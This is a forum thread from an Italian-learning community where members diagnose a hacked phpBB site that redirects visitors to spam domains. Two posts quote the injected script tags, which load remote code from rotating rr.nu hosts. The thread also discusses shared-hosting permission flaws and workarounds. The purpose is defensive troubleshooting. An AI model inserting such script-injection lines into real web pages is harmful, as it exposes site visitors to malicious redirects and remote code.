Site Hacked? Need a hand?

Join us here for some fun chit chat, or share your opinions on rumours and gossip in the news. Beginners and advanced Italian speakers are all welcome!
Post Reply
User avatar
Chris Corbyn
Posts: 335
Joined: Wed Aug 26, 2009 5:32 am
Location: Melbourne, Australia

Site Hacked? Need a hand?

Post by Chris Corbyn »

One for the admins: I'm being redirected to a handful of different "spam" (and potentially damaging) websites when opening the forum. It appears somebody has hacked the code base of the forum to do this. Some shared web hosts do not have strong enough security policies, making it possible for other users on the same server to actually edit your own website... I'm not sure which web host you're with, but it seems that either this is what's happened, or somebody has been able to take advantage of an exploit in the new phpBB software and inject some JS into one of the pages. I'm at work right now, but will take a closer look "from the outside" when I get a free moment.

If you need somebody to look fix it, let me know. I'm a full-time PHP and Ruby developer by profession.

Also, if you would like to get off shared hosting, I would be happy to set you guys up on a VPS (a virtual machine, where you have full control of the server, without other users). I doubt the forum uses too much traffic ;)
User avatar
Chris Corbyn
Posts: 335
Joined: Wed Aug 26, 2009 5:32 am
Location: Melbourne, Australia

Re: Site Hacked? Need a hand?

Post by Chris Corbyn »

This has been injected into your templates:

Code: Select all

<script src="http://astre09atyqr.rr.nu/nl.php?p=d"></script>
</body>
</html><script src="http://ouvech35oicetim.rr.nu/nl.php?p=d"></script>
If you "View Source" in your browser and scroll to the very last lines of HTML, you'll see this. It is malicious and needs removing. It is currently giving a 404 error, so not doing much harm, but earlier it was redirecting your users to some other site. I never waited long enough for the page to load to know what the other site was, but it was either a .ru or a .nu domain.

This is almost certainly a hack on the server itself, not an exploit by a user posting on the forum, due to the placement of the JavaScript in the template.
User avatar
Chris Corbyn
Posts: 335
Joined: Wed Aug 26, 2009 5:32 am
Location: Melbourne, Australia

Re: Site Hacked? Need a hand?

Post by Chris Corbyn »

On a closer look, the domains change each time you refresh, so presumably some are working, and some are 404'ing.
Peter
Posts: 2902
Joined: Mon Feb 07, 2005 12:41 pm
Location: Horsham, West Sussex, England

Re: Site Hacked? Need a hand?

Post by Peter »

Thanks for this, Chris. Calum is aware of the problem and has done quite a lot of work already to try to correct it. He's away for a few days' holiday and will continue when he returns. I am not sure if there is anything you can do to help, but I would suggest that you PM him. :) I would love to get my hands on the scumbag(s) that do this sort of thing - such tiny minds! :evil:
User avatar
Chris Corbyn
Posts: 335
Joined: Wed Aug 26, 2009 5:32 am
Location: Melbourne, Australia

Re: Site Hacked? Need a hand?

Post by Chris Corbyn »

Yeah, it winds me up people doing stuff like this. They're probably trying to drive traffic to their dodgy website in order to get it ranking higher in Google. There might be a simple fix on the permissions of the home directory on the server too. There are two mistakes commonly made:

1. Web servers usually run Apache. If all user accounts serve web pages under the same Apache user, it's easy for other users to modify content that is writable to the website itself.
2. Web servers run Linux. Linux is secure even with multiple users on the same server, if set up correctly. One part of "correctly" setting up the server, is to make sure only the owner of a particular user account can change into that user's home directory/folder, let alone write to it. Slack permissions make it very easy to casual hackers to make changes.

Glad callum is aware of it and looking into it. Hit me up if you need any guidance :)
User avatar
-Luca-
Posts: 546
Joined: Thu Oct 07, 2010 3:08 pm
Location: Italia, Abruzzo

Re: Site Hacked? Need a hand?

Post by -Luca- »

Same thing Chris. I often am redirected to another internet page when opening the forum page.
I've already told Calum about this. I scanned my computer for any malware , virus, trojan ect ect, but it's totally clean.
However, who's noticing this, please write on this thread.

How can I fix it Chris?

Grazie
Italians don't know what Caesar salad is !!
User avatar
Chris Corbyn
Posts: 335
Joined: Wed Aug 26, 2009 5:32 am
Location: Melbourne, Australia

Re: Site Hacked? Need a hand?

Post by Chris Corbyn »

-Luca- wrote:How can I fix it Chris?
You can't really fix it from your side very easily. The easiest way to get around it would be to turn JavaScript off in your web browser, but I wouldn't advise it, since many websites depend on it (including small parts of this site, such as the BBCode buttons to bold your text etc). If you're willing to run a separate web browser just to access the forum, then this may be a viable option. In Chrome and Firefox, it is found in the Advanced settings. I have Chrome open right now, and it's under "Content Settings".

You can also block the domains (either by firewall, or by editing your hosts file, which requires some technical expertise) that the JavaScript is loading, but there seem to be a number of them and I can't get the full list without access to the server, unfortunately, so this sort of goes out of the window for now. I think we'll just have to wait for Calum to return :)
User avatar
-Luca-
Posts: 546
Joined: Thu Oct 07, 2010 3:08 pm
Location: Italia, Abruzzo

Re: Site Hacked? Need a hand?

Post by -Luca- »

Thanks Chris :)

I could open the forum page using firefox....we'll see... thanks again
Italians don't know what Caesar salad is !!
Peter
Posts: 2902
Joined: Mon Feb 07, 2005 12:41 pm
Location: Horsham, West Sussex, England

Re: Site Hacked? Need a hand?

Post by Peter »

Touch wood I have yet to experience any problems on my desktop using Chrome (so much better than IE!!!) but it's the Macbook, running Safari, on which the problem surfaces. And Safari is supposed to be more robust..... mmm.. penso di no!! :)
User avatar
Quintus
Posts: 421
Joined: Thu Jun 30, 2011 8:22 am
Location: Florence, Italy

Re: Site Hacked? Need a hand?

Post by Quintus »

-Luca- wrote:I scanned my computer for any malware , virus, trojan ect ect, but it's totally clean. However, who's noticing this, please write on this thread.
Ciao Luca,

Ecco altre informazioni su ciò che accade da me. I have Firefox, Opera and, of course, IE installed on XP. I currently run Opera and am not redirected elsewhere when opening impariamo.com. Everything is ok with Firefox as well. Oddly enough: both Opera and Firefox don't show any extraneous line outside of the <html>...</html> tags. I have the "Enable Javascripts" checkbox enabled both in Opera and Firefox. It looks like these browsers filter irregular/illegal scripts out of the source code and possibly display a cleansed version of it.

Instead, with MSIE (Ver. 7.0.5730.11), everything happens just as Chris said. The first time I tried, the homepage of impariamo.com was shown, but then the browser was redirected to another site. Though I couldn't see anything of it because the operating system issued a GPF (General Protection Fault) before the screen was refereshed, and so the browser crashed.

The second time I stopped the browser just before the forum homepage was completely drawn, just trying to avoid being redirected. I found at the end of the html code:

<script src="http://asin54grepl.rr.nu/nl.php?p=d"></script>
</body>
</html><script src="http://ily23visi.rr.nu/nl.php?p=d"></script>

From the third time on (each time either closing IE and the re-opening it or not), the browser wasn't redirected, but the extraneous lines were still there.

La spiegazione? Boh! :D Vado da anni con Opera su Internet senza nemmeno un antivirus installato. O sono sfacciatamente fortunato o è merito un po' anche del browser. Mi sembra che questo browser si dia parecchio da fare contro scripts e frauds . Ma secondo me la verità è che any browser is so much better than IE, come ha detto Peter.

Ciao,
Franco

--
P.S.
Peter, "touch wood", here's another one of the same kind as "I can see for miles"! We say "tocchiamo ferro", "touch iron"! :D
Peter
Posts: 2902
Joined: Mon Feb 07, 2005 12:41 pm
Location: Horsham, West Sussex, England

Re: Site Hacked? Need a hand?

Post by Peter »

"Touch iron" eh! Not when it's freezing cold I wouldn't!!! :lol:

I have to say there are some strange things happening. I cannot access my PMs, at least not the latest one that Joe sent, although on clicking on Previous Message I was able to read that one. Also, there is something odd in the Moderator Control Panel; I have sent Calum an email with a screen print to let him know. There are one or two other things as well. Can others trawl round the sit and post any problems they encounter. Thanks. :)
User avatar
-Luca-
Posts: 546
Joined: Thu Oct 07, 2010 3:08 pm
Location: Italia, Abruzzo

Re: Site Hacked? Need a hand?

Post by -Luca- »

Ciao Quintus, si l'indirizzo che hai riportato è uno di quello su cui vengo reindirizzato.
Ora non accade da ieri...chissà , tocchiamo ferro... o...come faremmo qui in Italia....una grattatina alle...ehm....ai gemelli... :D

Peter, cos'è che non va con pannello di controllo moderatore?
Italians don't know what Caesar salad is !!
User avatar
calum
Posts: 391
Joined: Sun Oct 29, 2006 8:46 pm
Location: Scozia

Re: Site Hacked? Need a hand?

Post by calum »

Chris Corbyn wrote:If you need somebody to look fix it, let me know. I'm a full-time PHP and Ruby developer by profession.
Hi Chris,

thank you for your very kind offer. I have emailed you privately regarding the current forum problem.
User avatar
Chris Corbyn
Posts: 335
Joined: Wed Aug 26, 2009 5:32 am
Location: Melbourne, Australia

Re: Site Hacked? Need a hand?

Post by Chris Corbyn »

Thanks, Calum!
User avatar
Chris Corbyn
Posts: 335
Joined: Wed Aug 26, 2009 5:32 am
Location: Melbourne, Australia

Re: Site Hacked? Need a hand?

Post by Chris Corbyn »

Things should be better now, and if it happens again—before I take a closer look at where the source of the issue is tomorrow— I have written a little ruby script to clean up the mess in under 30 seconds.

A domani! :)
Post Reply

Who is online

Users browsing this forum: No registered users and 0 guests